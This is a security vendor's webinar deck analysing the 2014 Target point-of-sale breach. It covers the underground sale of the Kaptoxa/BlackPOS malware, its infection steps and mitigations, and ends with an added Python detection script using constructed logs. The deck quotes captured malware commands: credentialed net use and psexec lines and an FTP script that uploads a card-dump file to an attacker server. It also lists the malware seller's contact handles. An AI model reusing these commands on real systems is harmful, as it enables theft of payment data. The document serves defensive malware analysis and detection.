The Target Breach: Anatomy of an Attack


Published on February 4, 2014

Author: AlertLogic

Alert Logic's Security Research Team examines the anatomy of a breach

The Target Data Breach: Anatomy of an Attack
February 4, 2014
Stephen Coty, Director, Threat Research
Diane Garey, Product Marketing

Today's Agenda
• What's in the News
• About POS Malware
• How the Malware Works
• How to Protect Yourself

Logistics
• Ask a question anytime using the "Question Box"
• Look for slides on the Alert Logic SlideShare account
• You'll get an email with a link to today's recording
• Live Tweet today's event: #AlertLogic_ACID

30 Days of the Target Breach (timeline slide: Dec 18th, Jan 10th, Jan 15th, Jan 17th)

You Never Want to Send This Communication (slide shows Target's customer breach notification)

What's Being Reported About the Attack
• Malicious software infects POS systems and sends credit card data via FTP
• Possibly a home-grown POS system running Windows OS
• Malware traced to Russia and sold to 60 European cyber criminals

About the Impact
• 110 million customers affected
• Data being sold on the underground market
• Eight other retailers have been compromised
• Arrests being made of people using the cards

Malware for Sale
• Went into testing Feb 12, 2013 under the title: "Dump CC memory grabber (pos-trojan)"
• Underground community laughed at the outrageous price
• Currently not being sold due to Ree[4] selling out buyers

Three editions were advertised (seller's wording, translated from Russian):

Economy Version ($1800)
• Implemented by sending protakolu FTP
• Log is not encrypted
• 1st updated edition free
• Rebuild product 200 $ (max 3)
• No support

Budget Version ($2000)
• Implemented by sending protakolu FTP
• Log encrypted, invented us cipher
• Free updates for 3 months
• Rebuild 100 $ (max 5)
• Support

Full Version ($2300)
• Shipping through the gate
• Log encrypted, cipher invented by us
• Free updates for life
• Rebuild further by $ 100

More Malware Sales Details
• License agreement (translated from Russian)
  – "You use the program on your own risk and creators assume no responsibility for your further use of this software. When buying, you automatically accept rules. Transfer programs and reselling third parties is prohibited and threatened deprivation of licenses and just what is included in your version."
• Seller Information
  – E-mail 1:
  – E-mail 2:
  – ICQ: 565033
  – Skype: s.r.a.ree4

Stolen Credit Cards are Selling for $15-60
• Initial dumps: ~$12 average
• Recent dumps: ~$15-60 range

How the Malware (Kaptoxa-Rescator) Works
• Infects POS system: dum.exe executes mmon.exe
• Disables firewall: creates an autorun entry to launch at boot
• Establishes share: net.exe/net1.exe creates a Windows share
• Scrapes memory: scrapes tracks 1 & 2 from credit card data
• Saves data: to a default .dll file
• Stores and forwards data: to an internal server as a .txt file, which then sends the data to an external FTP server controlled by the attackers

Normal POS Activity: Pre-Infection

Post-Infection Activity: Step 1: New Service

Post-Infection Activity: Step 1.1: Looks like a regular user; starts POSWDS

Post-Infection Activity: Step 1.2: net.exe establishes a Windows share

Filtering for commands (the commands below were issued by the malware and captured during analysis):

cmd.exe /c move C:\WINDOWS\system32\net.EXE
net start POSWDS
C:\WINDOWS\system32\cmd.exe /c net use S:$\WINDOWS\twain_32a.dll /user:ttcopscli3acs\Best1_user BackupU$

Post-Infection Activity: Step 2

BackDoor-FBPL takes the following actions:

Step 1: C:\WINDOWS\system32\cmd.exe /c psexec /accepteula -u ttcopscli3acs\Best1_user -p BackupU$r cmd /c "taskkill /IM bladelogic.exe /F"
Step 2: c:\windows\system32\cmd.exe /c psexec /accepteula -u ttcopscli3acs\Best1_user -p BackupU$r cmd -d bladelogic

BackDoor-FBPL sleeps until the predetermined times of 10:00am and 5:00pm, then runs:

Step 1: C:\WINDOWS\system32\cmd.exe /c move C:\data_2014_1_20_17_53.txt (the file name is built from the system date and time)

BMC Whitepaper (slide shows an excerpt from the BMC BladeLogic whitepaper)

Post-Infection Activity: Step 2 continued

Step 2: Write data to a text file (cmd.txt):

open digitalw
Crysis1089
cd etc
cd bin
send C:\data_2014_1_20_17_53.txt
quit

Step 3: Command line:

c:\windows\system32\cmd.exe /c ftp -s:c:\program files\xxxxxxxxxx\temp\cmd.txt > c:\xxxxxxxxxx\temp\cmd.txt

Theory: How the Malware was Delivered: Ariba Vendor Portal

Theory: How the Malware was Delivered: Login to Portal

Theory: How the Malware was Injected: NCR POS Terminals

Evolution of Target POS Malware (timeline slide: 2008, 2010, 2012, 2013)
• Memory Dumper: copies a specific process in memory
• AlinaPOS / DexterPOS: v1 created; v2 encryption; v2.1 logging; v3.2 & 5.2 exfiltration; steals the process list from an infected machine while parsing memory dumps
• VSkimmer: detects card readers, grabs information, sends data to a control server
• BlackPOS / Kaptoxa / Rescator

Kaptoxa & Others Originated from Dexter
• Dexter:
  – Able to read process memory from infected machines
  – Parses memory dumps looking for track 1 & 2 of the credit card data
• Infected POS systems in 40 countries
  – 42% of the systems infected were in NA
  – 19% in the UK
• Targeted Windows OS

How to Mitigate Risk
• Scan POS systems with your choice of antivirus
• Check for the removal of autorun keys
  – HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run with the value "svchit"
• Check for removal of three executables
  – %USERPROFILE%/svchst.exe
  – Dum.exe
  – Mmon.exe
• Disable external FTP access outbound from the POS system on the network vs the host itself
• Create a whitelist of acceptable external addresses using IP filtering rules or Access Control Lists (ACL)

Contact us for a copy of our Malware Analysis Report
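A defender-side check that ties the post-infection chain above (the twain_32a.dll share, the psexec/BladeLogic steps, the timed FTP upload, the data_<date>.txt dump name) to the indicators on the mitigation slide (the "svchit" autorun value and the svchst/dum/mmon binaries). This is an added example, not code from the deck or from Alert Logic; the hostnames, paths, placeholders and the sample process-creation records are constructed.

```python
import re
from datetime import datetime

# Indicators are taken from the slides; everything else here is constructed.
RULES = {
    "share_mapped_as_dll": re.compile(r"net\s+use\s+\S+\s+\S*twain_32a\.dll", re.I),
    "best1_user_psexec":   re.compile(r"psexec\b.*-u\s+\S*Best1_user\b", re.I),
    "bladelogic_killed":   re.compile(r"taskkill\s+/IM\s+bladelogic\.exe", re.I),
    "ftp_script_upload":   re.compile(r"\bftp(\.exe)?\s+-s:", re.I),
    "dump_file_name":      re.compile(r"\bdata_\d{4}(_\d{1,2}){4}\.txt\b", re.I),
    "autorun_svchit":      re.compile(r"CurrentVersion\\Run\b.*\bsvchit\b", re.I),
    "known_binary":        re.compile(r"\\(svchst|dum|mmon)\.exe\b", re.I),
}
EXFIL_HOURS = (10, 17)  # the backdoor woke at 10:00am and 5:00pm to push the file out

def parse_line(line):
    """Split a constructed '<ISO timestamp> <host> <command line>' record."""
    ts, host, cmd = line.split(" ", 2)
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"), host, cmd

def match_line(line):
    """Return the rule names that fire on one process-creation record."""
    ts, host, cmd = parse_line(line)
    hits = [name for name, rx in RULES.items() if rx.search(cmd)]
    # An ftp script run in the first minutes of an exfil hour is the strongest signal.
    if "ftp_script_upload" in hits and ts.hour in EXFIL_HOURS and ts.minute < 5:
        hits.append("scheduled_exfil_window")
    return hits

def scan(lines):
    """Group every (rule, command) hit by host so a responder sees the chain per machine."""
    findings = {}
    for line in lines:
        hits = match_line(line)
        if hits:
            _, host, cmd = parse_line(line)
            findings.setdefault(host, []).extend((h, cmd) for h in hits)
    return findings

# Constructed sample records: hostnames, paths and <password> are placeholders.
SAMPLE_LOG = [
    r"2014-01-20T09:58:12 POS-LANE-07 C:\WINDOWS\system32\cmd.exe /c net use S: \\POS-SRV\c$\WINDOWS\twain_32a.dll /user:ttcopscli3acs\Best1_user <password>",
    r'2014-01-20T09:59:01 POS-SRV C:\WINDOWS\system32\cmd.exe /c psexec /accepteula -u ttcopscli3acs\Best1_user -p <password> cmd /c "taskkill /IM bladelogic.exe /F"',
    r"2014-01-20T10:00:07 POS-SRV c:\windows\system32\cmd.exe /c move C:\data_2014_1_20_10_0.txt c:\xxxxxxxxxx\temp\dump.txt",
    r"2014-01-20T10:00:09 POS-SRV c:\windows\system32\cmd.exe /c ftp -s:c:\program files\xxxxxxxxxx\temp\cmd.txt",
    r"2014-01-20T12:30:44 POS-LANE-03 reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v svchit /d C:\Users\pos\svchst.exe",
    r"2014-01-20T13:15:22 POS-LANE-03 C:\WINDOWS\system32\svchost.exe -k netsvcs",  # legitimate, must not fire
]
```

Note that the legitimate svchost.exe record does not match the svchst.exe rule, which is the look-alike name the malware used.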

Credits to the Sources of Data (the slide's source links were not captured)

Join Tomorrow's Webinar: Delivering Real Protection: Alert Logic Security-as-a-Service
• Fully managed intrusion detection and log management
• Deploy anywhere your datacenter is located

Thank you!
To follow our research: #AlertLogic_ACID
"Malware Analysis Report"
